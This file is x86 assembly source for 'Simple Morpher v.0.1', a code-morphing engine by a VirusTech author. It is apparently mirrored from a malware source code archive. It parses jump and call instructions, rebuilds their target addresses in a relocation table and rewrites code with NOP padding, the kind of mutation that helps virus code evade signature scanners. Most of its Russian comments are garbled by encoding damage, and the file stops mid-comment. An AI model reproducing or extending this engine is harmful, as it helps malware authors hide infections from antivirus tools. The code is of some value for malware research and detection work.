mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 10:55:28 +00:00
759 lines
22 KiB
NASM
759 lines
22 KiB
NASM
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; Simple Morpher v.0.1 :
|
|||
|
; :
|
|||
|
; x0man <20> 2008 :
|
|||
|
; :
|
|||
|
; http://www.virustech.org/ :
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
;-----------------------------------------------------------------------------------------:
|
|||
|
; :
|
|||
|
;<3B> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. :
|
|||
|
; :
|
|||
|
;<3B><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: :
|
|||
|
; :
|
|||
|
;_OPCODE struct; :
|
|||
|
; dwOldAddress dd ? ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) :
|
|||
|
; dwNewAddress dd ? ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) :
|
|||
|
; dwJumpAddress dd ? ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>) :
|
|||
|
; ; (<28><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) :
|
|||
|
; dwLength dd ? ; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
; ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> :) :
|
|||
|
;_OPCODE ends :
|
|||
|
; :
|
|||
|
;<3B> "<22><><EFBFBD>" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
; 1. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>, <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> _OPCODE. :
|
|||
|
; 2. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) :
|
|||
|
; 3. <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> EIP <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>. :
|
|||
|
; 4. <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> NOP) :
|
|||
|
; :
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> :
|
|||
|
; 1. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
; 2. <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(<28><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>). :
|
|||
|
; :
|
|||
|
; :
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD>... <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>! :
|
|||
|
; :
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD> Catchy_32, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> :
|
|||
|
; http://www.wasm.ru, <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. :
|
|||
|
; :
|
|||
|
;GreeTz: :
|
|||
|
; Osen :
|
|||
|
; izee [ EOF-Project ] http://eof-project.net/ :
|
|||
|
; :
|
|||
|
; tPORt (http://www.tport.org/) :
|
|||
|
; REVENGE(http://www.revenge-crew.com/) :
|
|||
|
; TLG (http://tlg.astalavista.ms/) :
|
|||
|
; TSRh (http://tsrh.org.ua/) :
|
|||
|
; TPOC (http://vx.netlux.org/tpoc/) :
|
|||
|
; :
|
|||
|
; :
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>! :
|
|||
|
; :
|
|||
|
; 10.05.2008 :
|
|||
|
; x0man [VirusTech] :
|
|||
|
; http://www.virustech.org :
|
|||
|
;-----------------------------------------------------------------------------------------:
|
|||
|
|
|||
|
.386
|
|||
|
.model flat, stdcall
|
|||
|
option casemap :none
|
|||
|
|
|||
|
include \MASM32\INCLUDE\windows.inc
|
|||
|
include \MASM32\INCLUDE\kernel32.inc
|
|||
|
include \MASM32\INCLUDE\user32.inc
|
|||
|
|
|||
|
includelib \MASM32\LIB\kernel32.lib
|
|||
|
includelib \MASM32\LIB\user32.lib
|
|||
|
|
|||
|
; #########################################################################
|
|||
|
|
|||
|
_OPCODE struct
|
|||
|
dwOldAddress dd ? ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
dwNewAddress dd ? ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
dwJumpAddress dd ? ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
; (<28><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
dwLength dd ? ; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> :)
|
|||
|
_OPCODE ends
|
|||
|
|
|||
|
; #########################################################################
|
|||
|
|
|||
|
.code
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> :)
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
test_code:
|
|||
|
@@:
|
|||
|
jmp @F
|
|||
|
mov eax, edx
|
|||
|
pop eax
|
|||
|
push eax
|
|||
|
call @F
|
|||
|
cmp eax, 0
|
|||
|
jne @B
|
|||
|
jmp @B
|
|||
|
add ecx, edx
|
|||
|
add eax, edx
|
|||
|
xchg edx, ecx
|
|||
|
call @B
|
|||
|
jne @F
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
jne @B
|
|||
|
ret
|
|||
|
@@:
|
|||
|
ret
|
|||
|
int 3
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
include Catchy32\Catchy32.inc
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: dwCurrentAddress - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> |
|
|||
|
; |
|
|||
|
; 00000000: 74 30 JE imm8 |
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> "imm8" |
|
|||
|
; <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> imm8 = 00000000 + 30 + 2 = 00000032 |
|
|||
|
; <20>.<2E>. |
|
|||
|
; 00000000 - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; 30 - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; 2 - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> JE imm8 |
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
; 00000000: 74 30 JE 00000032 --. |
|
|||
|
; 00000002: | |
|
|||
|
; | |
|
|||
|
; 00000032: <-----<2D> |
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> |
|
|||
|
; <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ;-) |
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::|:::|
|
|||
|
; IN dwCurrentAddress : <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; OUT EAX : <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
get_jump_address proc dwCurrentAddress : DWORD
|
|||
|
|
|||
|
push ecx
|
|||
|
push edi
|
|||
|
|
|||
|
mov edi, dwCurrentAddress
|
|||
|
mov al, byte ptr [edi]
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; XX imm8
|
|||
|
cmp al, 070h
|
|||
|
jl @F
|
|||
|
cmp al, 07Fh
|
|||
|
jna @_jump_imm8_
|
|||
|
|
|||
|
@@:
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
cmp al, 0EBh
|
|||
|
je @_jump_uncond_imm8_
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; 0F XX imm32
|
|||
|
cmp al, 00Fh
|
|||
|
jne @F
|
|||
|
mov ah, byte ptr [edi + 1]
|
|||
|
cmp ah, 080h
|
|||
|
jl @F
|
|||
|
cmp ah, 08Fh
|
|||
|
jna @_jump_imm32_
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
@@:
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; JMP imm32
|
|||
|
cmp al, 0E9h
|
|||
|
je @_jump_uncond_imm32_
|
|||
|
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; CALL
|
|||
|
cmp al, 0E8h
|
|||
|
je @_call_imm32_
|
|||
|
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
jmp @_exit_
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
@_jump_imm8_:
|
|||
|
@_jump_uncond_imm8_:
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
movzx eax, byte ptr [edi + 1]
|
|||
|
mov cl, al
|
|||
|
test cl, 10000000b ; isNegative?
|
|||
|
|
|||
|
jnz @_neg_1
|
|||
|
add edi, eax
|
|||
|
add edi, 2
|
|||
|
xchg eax, edi
|
|||
|
jmp @_exit_
|
|||
|
|
|||
|
@_neg_1:
|
|||
|
neg al
|
|||
|
sub al, 2
|
|||
|
sub edi, eax
|
|||
|
xchg eax, edi
|
|||
|
jmp @_exit_
|
|||
|
|
|||
|
|
|||
|
@_jump_imm32_:
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov eax, dword ptr [edi + 2]
|
|||
|
mov ecx, eax
|
|||
|
shr ecx, 24d
|
|||
|
test ecx, 10000000b ; isNegative?
|
|||
|
|
|||
|
jnz @_neg_2
|
|||
|
add eax, edi
|
|||
|
add eax, 6
|
|||
|
jmp @_exit_
|
|||
|
|
|||
|
@_neg_2:
|
|||
|
neg eax
|
|||
|
sub eax, 6
|
|||
|
sub edi, eax
|
|||
|
xchg eax, edi
|
|||
|
jmp @_exit_
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
|
|||
|
|
|||
|
@_jump_uncond_imm32_:
|
|||
|
@_call_imm32_:
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; JMP imm32 & CALL imm32
|
|||
|
mov eax, dword ptr [edi + 1]
|
|||
|
mov ecx, eax
|
|||
|
shr ecx, 24d
|
|||
|
test ecx, 10000000b ; isNegative?
|
|||
|
|
|||
|
jnz @_neg_3
|
|||
|
add edi, eax
|
|||
|
add edi, 5
|
|||
|
xchg eax, edi
|
|||
|
jmp @_exit_
|
|||
|
|
|||
|
@_neg_3:
|
|||
|
neg eax
|
|||
|
sub eax, 5
|
|||
|
sub edi, eax
|
|||
|
xchg eax, edi
|
|||
|
;///////////////////////////////////////
|
|||
|
@_exit_:
|
|||
|
|
|||
|
pop edi
|
|||
|
pop ecx
|
|||
|
|
|||
|
ret
|
|||
|
get_jump_address endp
|
|||
|
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.... |
|
|||
|
; |
|
|||
|
; IN dwAddress - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; IN pOpcodes - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; OUT EAX - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>... |
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
get_new_jump_address proc dwAddress:DWORD, pOpcodes : DWORD
|
|||
|
push ecx
|
|||
|
|
|||
|
assume ecx : ptr _OPCODE
|
|||
|
mov ecx, pOpcodes
|
|||
|
mov eax, dwAddress
|
|||
|
|
|||
|
@@:
|
|||
|
cmp [ecx].dwOldAddress, eax
|
|||
|
je @F
|
|||
|
add ecx, sizeof _OPCODE
|
|||
|
cmp [ecx].dwOldAddress, 0
|
|||
|
jne @B
|
|||
|
xor eax, eax
|
|||
|
@@:
|
|||
|
mov eax, [ecx].dwNewAddress
|
|||
|
|
|||
|
pop ecx
|
|||
|
ret
|
|||
|
get_new_jump_address endp
|
|||
|
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> NOP |
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD>! <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 0CCh |
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
; IN dwCodeAddress - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; IN dwOutputBuffer - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> |
|
|||
|
